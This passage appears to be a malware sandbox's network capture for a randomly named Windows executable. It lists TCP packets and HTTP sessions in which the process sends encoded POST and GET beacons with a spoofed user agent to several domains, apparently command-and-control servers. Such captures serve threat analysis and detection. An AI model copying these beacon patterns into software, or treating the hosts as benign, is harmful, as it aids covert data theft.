                                                                      Jan 13, 2025 15:13:36.621800900 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621800900 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621823072 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621835947 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621886015 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.625929117 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.630702972 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:42.495239019 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:42.500083923 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:42.507292032 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:42.519197941 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:42.524066925 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:43.444924116 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:43.444978952 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:43.445035934 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:44.027194023 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.043294907 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.048274040 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:45.048357964 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.068336964 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.073384047 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:46.013258934 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:46.013345957 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:46.013616085 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:46.571181059 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.589236975 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.594182014 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:47.594281912 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.606415987 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.611464024 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:47.611476898 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:48.566893101 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:48.566920996 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:48.567336082 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:49.117573977 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.138190985 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.145230055 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:50.150302887 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.161183119 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.168231010 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:51.067569971 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:51.067591906 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:51.067775965 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:51.076719999 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:51.081615925 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:56.111123085 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:56.116621971 CET804973847.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:56.116983891 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:56.131113052 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:56.136970043 CET804973847.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:57.643124104 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:57.648479939 CET804973847.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:57.655107975 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.652435064 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.658377886 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:58.658463955 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.674967051 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.679816008 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:00.275341988 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:00.275361061 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:00.279215097 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:00.346858025 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.355516911 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.360441923 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:01.360527039 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.378740072 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.383698940 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:01.383831978 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:02.901606083 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:02.906646013 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:02.906718016 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.917761087 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.922697067 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:03.923069954 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.930385113 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.935218096 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:05.589977026 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:05.590022087 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:05.590151072 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:05.593216896 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:05.598150015 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:10.633606911 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:10.638609886 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:10.639174938 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:10.651235104 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:10.656131029 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180357933 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180411100 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180458069 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:11.180725098 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180773020 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:12.164155960 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.183731079 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.192884922 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.192975998 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.210578918 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.219662905 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.785774946 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.785795927 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.786242008 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.790127039 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:14.726655006 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.747008085 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.752036095 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:15.752420902 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.770267010 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.775913954 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:15.776489019 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279290915 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279359102 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279506922 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279624939 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:16.279624939 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:17.273566008 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.295021057 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.299973011 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.300244093 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.310914993 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.315687895 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811443090 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811465979 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811616898 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.811948061 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811999083 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.814841032 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.820164919 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:32.032680988 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:32.037686110 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.037945986 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:32.060108900 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:32.065155983 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502594948 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502618074 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502635002 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502742052 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:33.570885897 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.589401960 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.594377995 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:34.594548941 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.614660978 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.620027065 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068764925 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068820000 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068860054 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068885088 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:35.068981886 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:36.118930101 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.137708902 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.142708063 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.142806053 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.162621975 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.167588949 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.167675972 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.603966951 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.604029894 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.604106903 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.604203939 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.604203939 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:38.664104939 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.683425903 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.688369036 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:39.688451052 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.696012020 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.700784922 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:40.163145065 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:40.163166046 CET8049749199.59.243.228192.168.2.8
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 47.83.1.90 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 15:12:03.506777048 CET | 481 | OUT | GET /k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.gayhxi.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 13, 2025 15:12:05.117938995 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 14:12:04 GMT
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Data Ascii: Request too large


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 15:12:20.256707907 CET | 740 | OUT | POST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvMSu4i2RUuOnTaZNsBVyiCVvJ9kDYzpc0QgFOQ4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 15:12:22.798211098 CET | 760 | OUT | POST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC9EJ+M1dE00uzw1QHvd6NQvK1Kj5b4MZJq5TzyV


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 15:12:25.341511965 CET | 1777 | OUT | POST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.8 | 49713 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:27.884059906 CET | 483 | OUT | GET /zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.promocao.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:28.331995010 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 13 Jan 2025 14:12:28 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 9973
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Server: hcdn
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      x-hcdn-request-id: c06013ba456b92f12bedf7b1c7183ad9-bos-edge2
                                                                      Expires: Mon, 13 Jan 2025 14:12:27 GMT
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.8 | 49714 | 104.21.18.171 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:33.381563902 CET | 737 | OUT | POST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr49dXMxstsDPMv9r0ijwiDAbr+kHJINrlj7axr9g=
                                                                      Jan 13, 2025 15:12:34.037123919 CET | 1088 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:33 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BSUU7A5I%2B8HDLDchLCo2xPdxLeuomz7zeRIWeKiMfFF%2BMIUbi20WDhxrCRf64aCWWRWQDgqQGbKhMJBouR1zVxN%2Bs0YbU%2FDqYBBGhhiJwWWEgx3HK8HOHtKKU71soSUVGvH"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb5f1a4a8c87-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2393&min_rtt=2393&rtt_var=1196&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.8 | 49715 | 104.21.18.171 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:35.926218033 CET | 757 | OUT | POST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAAzA+nv/N62N5YKB1q3anppDjqOzWmqXasJYVGmZ
                                                                      Jan 13, 2025 15:12:36.591033936 CET | 1079 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:36 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBZgsLJXLKEg0j2cqiu70vR9Jn7W5MMZ3N7ISmU1NfOPK3opPolBKVIPg0yqNAVHBhI0zj00DxnJ45h%2BEWFCdclS0Q7paiZWh5rkPHFTgTih79MKj32FVZwrJVinFaRat0eM"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb6f2b014232-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1536&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      7 | 192.168.2.8 | 49716 | 104.21.18.171 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:38.466509104 CET | 1774 | OUT | POST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4= [TRUNCATED]
                                                                      Jan 13, 2025 15:12:39.118366003 CET | 1090 | IN | HTTP/1.1 404 Not Found
